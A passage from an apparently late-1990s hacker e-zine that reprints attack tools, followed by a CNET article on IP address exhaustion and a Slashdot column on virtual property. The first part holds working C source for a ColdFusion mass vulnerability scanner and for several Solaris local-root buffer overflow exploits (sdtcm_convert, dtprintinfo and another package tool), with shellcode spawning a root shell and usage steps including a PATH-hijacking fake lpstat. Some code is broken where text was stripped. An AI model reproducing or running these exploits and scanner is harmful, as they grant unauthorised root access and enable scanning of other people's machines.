coupon towards purchases from the site. @HWA 32.0 quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml /* Quickie Coldfusion exploit finder v1.0 After seeing all the super lame hacks by groups desperatly seeking media wh0rage, like JPs new favorite group, Team spl0it, and all the lame crap they were using, I deciced to help them in their quest to look lame. Most of the 'tools' these people were releasing were nothing more then modified versions of my cgiscanner (cgiscan.c), so here is a newly coded, faster scanner for them to use and rip off. If I find this code, like the rest of my code, on JPs code site, with my name cleaverly removed, I am going to go take a shit on the hood of his car. This should also give McIntyre and Jericho some more sites to put in their hacked site archive on attrition.org that JP can rip off to. They have already shit on his car. This scanner scans an entire class C address, and does it with no bull. Enter the starting IP address, then the one you want to to stop on, and it will scan each box for the 3 parts of the bug. complies on HP-UX, Linux, *BSD to compile: luser$ gcc quickie.c -o quickie to run: luser$ ./quickie 123.123.123.2 123.123.123.254 >> somelog & coded by Bronc Buster May 1999 */ #include #include #include #include #include #include /* sets the timeout for connect() - you can change it if you want */ #define TOUT 2 /*****************************************************/ /* begin eLe3t prototypes */ /*****************************************************/ void phalse(int signo); int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec); void clean(char b[1024]); /*****************************************************/ /* end eLe3t prototypes */ /*****************************************************/ int main(int argc, char **argv) { char *temp; char *ip_ptr; char buff[1024]; /* who cares, we only want to HTTP header */ int f1,f2,f3,f4; /* f1.f2.f3.f4 when we disassemble first IP */ int l1,l2,l3,l4; /* l1.l2.l3.l4 when we disassemble last IP */ int i, tmp, n, lame; int sock; struct sockaddr_in target; char *coldf[4]; char *dis[4]; /* this is just for a pretty print */ dis[1] = "openfile.cfm"; dis[2] = "exprcalc.cfm"; dis[3] = "displayopenedfile.cfm"; /* checks for coldfusion bugs */ coldf[1] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; coldf[2] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; coldf[3] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; if(argc<2) exit(printf("\nUsage: %s start_ip ending_ip\n",argv[0])); printf("\n** A fast coldfusion exploit finder **"); printf("\ncoded by Bronc Buster - May 99\n"); /* parse ripped from HoGs HeaD domain scanner with a little */ /* modification - works good */ /* parse first ip - sorry no error checking */ temp=argv[1]; ip_ptr=(char *)strtok(temp,"."); /* get first field and look for . */ f1=atoi(ip_ptr); ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */ f2=atoi(ip_ptr); ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */ f3=atoi(ip_ptr); ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */ f4=atoi(ip_ptr); /* parse second ip */ temp=argv[2]; ip_ptr=(char *)strtok(temp,"."); /* get first field and look for . */ l1=atoi(ip_ptr); ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */ l2=atoi(ip_ptr); ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */ l3=atoi(ip_ptr); ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */ l4=atoi(ip_ptr); /* end parsing */ /* class C range checking - morons 'might' use the - hehehe */ if(f4<2 || l4>254) exit(printf("IP Numbers out of range\n")); /* class C only - anyone with a brain can make */ /* this scan class B or A nets - wow kidiez! */ for (i=f4;i<=l4;i++) { /* reconstruct the IP into a string */ sprintf(temp,"%d.%d.%d.%d",f1,f2,f3,i); bzero(&target,sizeof(target)); target.sin_addr.s_addr=inet_addr(temp); target.sin_family=AF_INET; target.sin_port=htons(80); /* ok, so this is a lame loop */ for(lame=1;lame;lame--) { printf("\nChecking %s:",temp); /* check for all 3 before we jump for joy */ for(n=1;n<4;n++) { sock=socket(AF_INET,SOCK_STREAM,0); if(sock<0) exit(printf("Error getting socket - socket()\n")); if(connect_time(sock,(struct sockaddr *)&target,sizeof(target),TOUT)==-1) { close(sock); printf("\n no HTTPD responce"); } else { printf("\n checking for %s - ",dis[n]); send(sock,coldf[n],strlen(coldf[n]),0); recv(sock, buff, sizeof(buff),0); if(strstr(buff,"200")) { close(sock); clean(buff); printf(" FOUND",dis[n]); } else { close(sock); clean(buff); printf(" not found",dis[n]); } } } } } printf("\n\nScan finished!\n"); printf("Have fun kiddies!\n"); return 0; } /**************************************************************/ /* eLe3t functions */ /**************************************************************/ /* fake return function for connect_time() */ void phalse(int signo) { return; } /* connect with timeout - for speed!@$(*%^@ */ int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec) { int s; alarm(0); signal(SIGALRM,phalse); alarm(nsec); if((s=connect(sockfd,(struct sockaddr *)saptr,salen))<0) { close(sockfd); if(errno==EINTR); errno=ETIMEDOUT; } alarm(0); signal(SIGALRM, SIG_DFL); return (s); } /* clean out buffer so we don't get fake readings */ void clean(char b[1024]) { int i; for(i=0;i<=strlen(b);i++) b[i]=NULL; } /* EOF */ @HWA 33.0 sdtcm_convert local root overflow exploit for Sparc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml /*============================================================================= sdtcm_convert Overflow Exploits( for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) [usage] % gcc ex_sdtcm_convert.c (This example program) % a.out If no response, hit ctrl+c # ============================================================================= */ #define ADJUST 2 #define OFFSET1 4000 #define LENGTH1 260 #define OFFSET2 6000 #define LENGTH2 1000 #define OFFSET3 6000+16*30 #define NOP 0xa61cc013 char exploit_code[] = "\x82\x10\x20\x17\x91\xd0\x20\x08" "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } unsigned long ret_adr; int i; main() { static char x[11000]; memset(x,'a',10000); ret_adr=get_sp()-6300; for (i = 0; i < 5000 ; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } ret_adr=get_sp() - 10200; if ((ret_adr & 0xff )==0) ret_adr+=4; printf("%lx\n",ret_adr); for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i> 8 ) &0xff; x[i+0]=(ret_adr >> 16 ) &0xff; x[i+1]=(ret_adr >> 24 ) &0xff; } for (i=0;i [Software] -> [Edit] -> [Add] -> [Harddisk] -> Directory: /tmp -> [Ok] ) # In /tmp/EXP directory, the temp files are made, please remove it. ============================================================================= */ #include #define ADJUST1 2 #define ADJUST2 1 #define BUFSIZE1 1000 #define BUFSIZE2 800 #define OFFSET 3600 #define OFFSET2 400 #define PKGDIR "mkdir /tmp/EXP" #define PKGINFO "/tmp/EXP/pkginfo" #define PKGMAP "/tmp/EXP/pkgmap" #define NOP 0xa61cc013 char exploit_code[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c" "\x94\x10\x20\x10\x94\x22\xa0\x10" "\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } unsigned long ret_adr; static char x[500000]; FILE *fp; int i; main() { system(PKGDIR); putenv("LANG="); if ((fp=fopen(PKGMAP,"wb"))==NULL){ printf("Can not write '%s'\n",PKGMAP); exit(1); } fclose(fp); if ((fp=fopen(PKGINFO,"wb"))==NULL){ printf("Can not write '%s'\n",PKGINFO); exit(1); } fprintf(fp,"PKG="); ret_adr=get_sp()-OFFSET; while ((ret_adr & 0xff000000) == 0 || (ret_adr & 0x00ff0000) == 0 || (ret_adr & 0x0000ff00) == 0 || (ret_adr & 0x000000ff) == 0) ret_adr += 4; printf("Jumping address = %lx\n",ret_adr); memset(x,'a',4); for (i = ADJUST1; i < 1000; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >>8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE1]=0; fputs(x,fp); fprintf(fp,"\n"); fprintf(fp,"NAME="); memset(x,'a',4); for (i = ADJUST2; i < BUFSIZE2; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0; i To: BUGTRAQ@netspace.org Subject: Solaris2.6,2.7 dtprintinfo exploits Hello. "dtprintinfo" is suid program, the stack buffer can be overflowed by '-p' option. I made an exploit program that can get root for Intel edition of Solaris2.6 and Solaris 2.7. Please test it. If you test this program, please set DISPLAY environment correctly before execution. /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ======================================================================== */ static char x[1000]; #define ADJUST 0 #define STARTADR 621 #define BUFSIZE 900 #define NOP 0x90 unsigned long ret_adr; int i; char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } main() { putenv("LANG="); for (i=0;i> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } -------------------------------------------------------------------- Date: Mon, 10 May 1999 13:15:36 JST From: "UNYUN@ShadowPenguin" To: BUGTRAQ@netspace.org Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits] Sorry, I forgot to to write the following things... Before execution of dtprintinfo exploit, please make a dummy lpstat command. for example, % cat > lpstat echo "system for lpprn: server.com" ^D % chmod 755 lpstat % setenv PATH .:$PATH % gcc ex_dtprintinfo.c % a.out Following exploit program is for Sparc Solaris. I tested on Solaris2.6. /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ========================================================================= */ #define ADJUST 0 #define OFFSET 1144 #define STARTADR 724 #define BUFSIZE 900 #define NOP 0xa61cc013 static char x[1000]; unsigned long ret_adr; int i; char exploit_code[] = "\x82\x10\x20\x17\x91\xd0\x20\x08" "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } main() { putenv("LANG="); for (i = 0; i < ADJUST; i++) x[i]=0x11; for (i = ADJUST; i < 900; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } The Shadow Penguin Security (http://base.oc.to/skyscraper/byte/551) UNYUN (unewn4th@usa.net) @HWA 37.0 Are we running out of IP numbers? how many class c's are left?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Net number system at a crossroads By Dan Goodin and Courtney Macavinta Staff Writers, CNET News.com NEWS.COM May 12, 1999, 4 a.m. PT URL: http://www.news.com/SpecialFeatures/0,5,36425,00.html special feature Alongside the highly public debate over domain names, a little-understood predicament--with more far-reaching consequences--is confronting the new nonprofit corporation in charge of the Net's administration. Forget about ".com." The critical resource under the Net's hood is numerical addresses, and the Internet Corporation for Assigned Names and Numbers now is in charge of those, too. Every online device or computer needs an Internet Protocol (IP) numerical address to connect to the global network. When the system was being designed, hardly anyone imagined that its 4.2 billion unique addresses would ever be exhausted. Just a few decades later, however, some in the technical community fear that the rapid pace of innovation one day may cause the Net to run out of numbers. Demand for IP numbers is naturally growing due to the Net's evolution as a meeting place and marketplace. Further draining the IP pool is the aggressive rollout of "always on" cable Net access and the array of handheld devices that need dedicated IP numbers. Currently, most online access providers and companies utilize a small batch of IP addresses by dynamically assigning the numbers based on demand when people log on to their networks. But with broadband services such as cable, customers must have their own dedicated number. "It's going to come to the point where your TV remote is speaking IP to your TV, and they'll each need an IP address," said Paul Vixie, an architect of the Net's address system. Under such a scenario, a typical household could have more than 250 IP addresses, he added. In a way the potential shortage of IP addresses is most analogous to the shortage of phone numbers that came about with the advent of fax machines and cellular phones, which has spurred the addition of new area codes. And the perceived scarcity of addresses is just the beginning. As more computers connect to the Net, the databases that map the numbers are growing larger and becoming unwieldy. The ever-increasing size of the network's so-called routing tables has some Net programmers worried. "There's going to be a point when machines can't handle the size," said Kim Hubbard, president of the American Registry for Internet Numbers, which is responsible for allocating and assigning IP addresses in the Americas. Although there is hope that a new standard, IP version 6 (IPV6), could help alleviate both problems, the timeline for a rollout is sketchy--estimates range from the next 5 to 25 years. That's why many in the Net addressing trenches agree that allocation of these precious resources must meet strict guidelines. "There is this constant tension about whose interest is being served," said Tony Rutkowski, principal consultant for the Next Generation Internet and a founder of the Internet Society. "It's a combination of how these IP addresses are allocated and to whom--and that is the rub." New nonprofit in the middle And now ICANN, which is mediating a number of other contentious debates, finds itself in the middle of the long-standing, international struggle over who should hold the key to the IP address treasure chest. At a public meeting in Berlin later this month, ICANN is expected to take its most definitive step on the issue, creating an organization to tackle IP addressing. Since last November, ICANN has been charged with overseeing the Net's technical administration, under a Memorandum Of Understanding it signed with the Commerce Department. ICANN also has been recognized by more than 25 nations in its new role. So far, ICANN's challenges posed by IP numbering have been overshadowed by other topics, such as authorizing new companies to register domains ending in ".com" or adding new top-level domains such as ".web" and ".firm." Along with the fact that domains have been a well-publicized issue, ICANN's leaders also don't see the IP address issue as terribly pressing. "We haven't needed to do anything in the way of [IP address] policy yet," said Michael Roberts, ICANN's interim chief executive. "There is potential scarcity. The thing to do is get moving on IPV6, which will deploy in an open and fair way based on reasonable need." But a failure to adequately tackle a range of problems surrounding IP addresses ultimately could cripple the Net. In fact, charting a new IP numbering course may prove to be ICANN's most important contribution. Chain of command gets longer In the past, policy and oversight of IP addresses has been left to the Internet Assigned Numbers Authority, the government-funded group that designed the numbering system under the leadership of the late Jon Postel. Under ICANN, the Internet Assigned Numbers Authority still distributes address space to three geographically diverse Regional Internet Registries (RIRs), which typically hand out the addresses to large end users such as Internet service providers and universities. ICANN will be operating under the same bottom-line principles that have guided the Internet Assigned Numbers Authority for the past three years. They call for a system that conserves addresses and routes Internet traffic more efficiently. The Internet Assigned Numbers Authority's functions may still be in place, but the chain of command is set to be dramatically altered. Whereas the buck used to stop at Postel, now it will stop at the ICANN board, which ultimately will be advised--and elected--by many representatives in the Net community, including regular online users. Some veteran Netizens view the shift as necessary, but potentially problematic. "One of the advantages of [the Internet Assigned Numbers Authority]--and one of its disadvantages--is that it rested with a single individual, and a single individual could easily make a decision," said Bill Manning, a staffer with the University of Southern California's Information Sciences Institute, which housed the Internet Assigned Numbers Authority and also was headed by Postel. "That nimbleness in being able to respond seems to be a necessary casualty in making [the] transition" to a privatized Internet. In keeping with its mission to turn over Net governance to the private sector, ICANN has proposed a model that establishes an address supporting organization (ASO), containing stakeholders who will forge new policies concerning IP numbering. At its Berlin meeting May 26, ICANN will vote on proposed bylaws for supporting organizations, including the ASO. The bylaws will set up an open membership consisting of IP address registries, ISPs, and end users. For a new policy to be enacted a majority of each membership category must approve it. Election of the new organization comes at a critical juncture in the evolution of the Net's address system, experts say, and is almost certain to stoke the public scrutiny surrounding ICANN. "It's important that [the ASO] understand the technical issues involved and are not swayed by the political expediencies that have been pressed in the past," said David Conrad, founder of the Asia Pacific Network Information Center (APNIC), one of the three IP address registries. This sentiment is echoed by ISPs, another faction whose input will be vital to the ASO. "How this policy recommendation body is formed within ICANN is a concern," said Barbara Dooley, president of ISP trade group the Commercial Internet Exchange. Numbers don't add up Not surprisingly, today's system is a far cry from the way things were done in the early days of the Net. Thirty years ago few architects of what was then called the Arpanet expected it to mushroom into a medium that would change the way people live, work, and do business. IP addresses were viewed as an endless resource that was free for the taking. Out of that thinking came the practice of doling out wastefully large blocks of numbers to companies or groups that asked for them. Ford Motor, Eli Lilly, and Hewlett-Packard are just three of the holders of the largest "legacy" blocks, known as Class A allocations, which contain more than 16.7 million addresses each. In 1995, leading cable Net access provider @Home appealed to the Internet Assigned Numbers Authority after its application for a Class A allocation was turned down. @Home ended up getting numerous smaller Class B allocations, creating some controversy among local registries. The legacy space doled out to those that had the foresight to ask for it is the source of jealousy for many latecomers. They point out that while Mercedes Benz holds nearly 17 million addresses, only 1.04 million have been allocated to the entire nation of China. "There are a number of different business issues we foresee in the future that will require IP addressing," said Bill Hurley, manager of new media and relationship marketing for Mercedes Benz. "We are looking to have an IP address for every car." ICANN no doubt will be pressured to tip the scales toward those who have IP envy. "Some people in Africa and South America want their own regional registries. Some of the ISPs want to have a bigger role in how the allocation is done," acknowledged Commerce Department spokeswoman Becky Burr, who is overseeing the agreement with ICANN. "There may be a more complicated mix of players," she added. "But it still will be a fairly straightforward allocation system." Despite pessimism about shortages in IP space and the politics of allocation, some legacy holders have voluntarily surrendered their blocks for the good of the Net community, such as the Defense Department and BBN, now owned by GTE. Stanford University also is in negotiations to return part of its huge block, according to school and registry officials. @HWA 37.1 And is webspace infinate? ~~~~~~~~~~~~~~~~~~~~~~~~~ Infinite Space From http://www.slashdot.org/ Posted by JonKatz on Thursday May 13, @10:00AM EDT from the Virtual-Property-(cont.) dept. Physicists, gamers, Web designers and developers and engineers took up (with a vengeance) the question of whether or not the Net and the Web was an Infinite Space, forever expansible. Most felt that while Web Space was infinite, desirable property isn't. Also comments about crackers, cryptography, gaming, virtual property, the future of the Net and the Web, and concerns about whether real world property laws apply online. All in all, a great cyber gab-fest, pro and con. E-mail poured in all weekend about Infinite Space -- whether or not space on the Net and Web is forever expansible. This was an offshoot of columns and discussions here last week about whether new connective technologies like eBay combined with the millions of middle-class Americans pouring onto the Web were escalating the concept of virtual property, already a custom on some gaming sites. On the subject of Infinite Space, I heard from physicists, academics, engineers, gamers, computer execs, developers and designers ­ some very brainy geeks who offered smart and diverging theories. While a majority of e-mailers thought virtual property was a big idea whose time had come, there were also skeptics claiming this idea wasn¹t really anything new. In one sense, they¹re right. Gamers have been trading virtual parts, symbols and characters for awhile. But the impact of new technology is often felt when new and middle-class users mainstream it, not when pioneers invent it. Linux isn't new either, but that doesn't mean nobody should write or talk about it. As open source reaches critical mass, it becomes significant. Same with other technologies from the phone to modems to computers themselves. Hackers were patching together BBS¹s from the earliest days of networked computing, but it wasn¹t until many more people, from housewives to business owners started pouring online that the Net took off. As more and more people -- most armed with credit cards and checkbooks -- continue to explore and use the Net and the Web, expect continuous and unimaginable change. But most of you know that. Note: Lots of people wrote asking if I was changing my column format to include more of my e-mail responses. Yes, I am. An interactive column should, when possible, include more voices than one. Not only do I get sick of myself, but I get especially weary of getting so much smart and thoughtful e-mail nobody but me ever sees, while the often highly testicular public posts on Threads are visible to everybody. Many visitors, lurkers and readers confuse Threads with reality. It is one reality, but not the only one. People have a perfect right to flame, but as my e-mail (and every other Slashdot writer and author demonstrates daily) smart lurkers constitute the vast, unseen majority of Slashdot readers. They also want to be seen and heard. So here are just a few of the posts ­ pro and con -- responding to my columns about virtual property and my questions about whether space on the Net is an Infinite Space: Boredom is More Significant, from: Stephane Lajoie "Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested? If you abstract away things like bandwidth and hard-drive storage (which seem to grow fast enough anyway), the answer to the first question is yes: the net is infinite. But you seem to imply that the second question is the same as the first, which it isn't. Crowdedness happens in a specific physical place. We can say that New York City is crowded, while Arkansas is close to empty. If we extend this concept to the net, you can say that slashdot.org is crowded while kgjrhegh.com is empty (the DN isn't even registered, anybody could move in there for free; not anybody could move in to Microsoft.com though). The same thing happens in physical space: if you abstract away things like the currently limited means of transportation, you can come to the conclusion that living space for humans in the universe is infinite. But just like people go to slashdot.org and not to kgjrhegh.com, you won't see people moving to Mars en masse even if affordable transportation becomes available: there just isn't anything fun to do there. I think it is Linus Torvalds who said that in a few decades, the primary motivation for people to do "anything" will be fear of boredom. The limit here isn't free domain names or available land in an online game. It's the attention span of people. People buy powerful characters in UO to get attention from other players. Once the game become dated and people start moving to Everquest, Asheron's Call or others, these characters will loose all their value because there won't be anybody to show them off to. You can't open a 20 screens megaplex in Nowhere, Arkansas. You can't sell web adds at kgjrhegh.com. Hope I could keep your attention for that long :). PS: The Cyber-Movers example was kinda weak. I mean, it's a bunch of engineers copying files around and setting up domain name servers. Hardly the signs of a revolution if you ask me :). Still, very interesting subject matter. PPS: I like this format of writing series of articles instead of moving on to a new subject for each article. Stéphane Lajoie / Ludus Design Nanotechnology and other answers, from Rob Jellinghaus: "Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested?" This question is familiar in another domain: nanotechnology. The general form of the question is, "Given sufficient technological development, are resources potentially inexhaustible? And if so, what happens to the economy?" In general, it is scarcity that creates value. In a world where there are infinite amounts of everything, there is no reason for everything not to be free. But when there is only so much of something, then competition arises for that scarce resource, and suddenly you need a way to determine who needs/wants/deserves it most. Presto: economics. Ultima Online could probably, in principle, expand their cyberverse to accomodate the influx of people craving land. But it's not clear that they should. The scarcity of land there is greatly increasing the value of each individual property, perhaps intensifying the fervor of their citizens, and certainly buying them advertising that they couldn't buy with their own money (your article being a great example). In other words, by keeping their virtual real estate scarce, they are more effectively competing for the attention of the world's gamers, by making it clear just how valuable that real estate is. In fact, UO (Ultima Online)perfectly exemplifies the two resources that are _not_infinite, and will never be: Human attention, as all domain name squatters know, is finite. There are only so many eyeballs, and only so many hours in a day that those eyeballs can be looking at your little corner of the cyberverse. UO is competing with Everquest (which is coming up fast). Catchy domain names ("slashdot.org") for instance, will always be more valuable than clunky ones ("www.mybiglongcompanyname.net"). - Computing and, especially, network resources are getting exponentially cheaper, but as exponentially more people go online, it remains fairly costly to serve large audiences. UO definitely incurs ongoing costs in hardware, network maintenance, and operations management, to keep its servers running; if they were to expand their universe infinitely, their costs would also expand infinitely. Later. Anyway, thanks for the thought-provoking questions, Liberating the Lurkers, from Dana Ryder, IMMSystems: "Congrats on the new format, if that¹s what it is. You are liberating the Lurkers! Posting comments like you are is the only way some of us can get our ideas out and hear the good ideas of others. The rule on Slashdot Threads seems to be that the dumber one is, the quicker you are to claim you¹re smarter than everybody else, or that you already knew everything everybody else is saying. I can¹t fault anybody for being stupid, but boy, are these people proud of it! Slashdot¹s columns on Virtual Property were talked about all day at my company ­ keep ?em coming!" Of Course Not, from: Randall L Joiner: "To your question about Infinite Space There are several answers: Of course not, physical (hardware) resources are limited by definition, and thus, eventually will run out. Within reason, yes, it's infinite, as tech grows, space keeps getting cheaper, there will always be room of some sort. The question really is, is valuable web property infinite? Many people have already answered that, and from the skim I did, most seem to think no. I have to disagree to an extent. Since games and sites only seem to hold interest for short time periods (game attention spans often measure in hours of game play), and people are constantly searching for the next game, I would guess that the interest of the gamers will constantly be going through these stages: 1. New game hits, is relatively unknown. 2. Some gamers become regulars, game grows to a small number of players. 3. Game catches on in the main stream, many people start playing. 4. The original players start tiring of it, (for various reasons) and sell out. 5. Older players go back to stage 1 with some other new game. I think we'll start seeing stage 5 in about 6 months to a year with Ultima. I give Diablo as an example... Few still play it, because everyone's jumped to Ultima. The new up-and coming is EverQuest. It's part of the game cycle, only now we have the middle-class coming in throwing money around. I want to know what's going to happen when the mass evac happens for the next great game, and the fools are stuck with character's they've spent loads of $ on, and are now not worth anything, and no one is around to play the game with? Even the "rich" couldn't keep up for to long, constantly buying new characters for each new game. Another problem I don't think you've thought of... What happens if there's a network down time? What happens if/when a hard-drive crashes and wipes out any record of you having owned the property? If I were the company running the hardware those games are running on, I'd make damn sure I had a clause stating they aren't responsible for lost characters/property/etc... Another problem. What happens when (not _if_) someone hacks a game and suddenly goes nuts with it? How about Virtual Theft? If I cracked the game, steal your house that you just paid 100,000 for, what recourse do you have? Then there's the difficulty with calling it property... We have a bung-hole load of property laws in the states, but do any of them apply to cyberspace? How about in a game where killing and taking property is a legal action? If I kill your character and taken the property you just bought, do you have any legal recourse in RL? No, I really don't consider that a silly problem either, as I've read some of the things people have gone to court over (and won!) that are much much more silly. Altogether, I'm just completely amused by the concept, and consider this just one more proof that most people really don't understand what the world or the net is really about." Please! Absolutely Nothing New Here, from: thom stuart (painfully): Much as it pains me every single time I realize it, I'm afraid that I have to report that once again you're picking value out of vapor and getting all excited about something that, as always, isn't exciting or new at all. I'm tempted to launch into an extensive diatribe, but i've got work to do today. Suffice it to say that the "virtual property" that's got you so frantic in the last couple days is nothing more than a sale of service. It's amazing that you're managing to misunderstand this to the extent where you think there's something new. Every month i buy a package of 'minutes' for my mobile phone from my wireless company. These are just numbers in a computer, of course - am I purchasing "virtual property" here? And, if i am, haven't people been doing that for years? I could subscribe to a paying-members-only web site; I could choose to pay for HBO; I could buy an Ultima Online account or good domain name from ebay. These are all the same thing - I'm buying the right to use a service. Just because I¹m not getting a physical product in return doesn't make it magic or 'cyber' or anything else you might want to think. Okay, the UO accounts and domain names might have certain 'added value' in terms of the time/effort invested in bringing them to their current status, but that doesn't make it any different. by buying an account or a domain, the purchaser is simply entitled to access to certain kinds of service in return for their cold hard cash - but hey, who pays in "physical cash" these days, anyway? Ooh! ooh! virtual property paid for with "virtual money"! another monumental technological discovery from jon katz! better write another /.column about this! please. Crackers, Gaming and Infinite Space (anonymous): Here's a copy of the comment I just posted... thought you might like it...BTW great set of articles, and I find your style to finally have settled out into something that doesn't seem megalomaniacal and much more suited to the world you've stepped into.. I've liked about 75% of your articles, those I didn't like were some of the earlier ones: It's bad enough that hackers are being berated by main stream media for supposedly "stealing" from large, anonymous corporations, can we all see what will happen when the middle class has a vested interest in computer security? What were to happen if a cracker got onto one of the Ultima online servers, helped himself to some UO Cash and then bought himself whatever he needs? Worse yet: Cracker gets onto the server, figures out some of it's data structure, and decides to get into another player's building and cleans him out? Crackers/malitious hackers finally have something that has value to steal and they would be stealing from mainstream america instead of the corps. This can have several consequences as I see it: First and formost: The biggest hacker backlash in history. You think the Kevin Mitnick case was bad... now the law enforcement officials no longer have to work on the "estimated losses" reported by companies when they get documents copied off their servers (say source code), they have real world price tags on what the damages were. Moreover, can we really trust mainstream american media to see the difference between hackers and crackers? It's bad enough that they can't do it now when the crackers are just defacing websites. Secondly: With a bit of luck, this will drive all aspects of computer security forward. I can see dedicated players paying godo dollars for crypto systems that would protect their online assets. As well, Internationalization of crypto technology will be given a big boost as non-North american players will want access to the same quality of crypto as we are privileged to have. Thirdly: Goverment regulation will quickly be pushed onto the scene. Any location generating real US$ seems to become the target of the US house and senate. Third, B: TAXATION! As is, it's very difficult to keep the internet taxes at 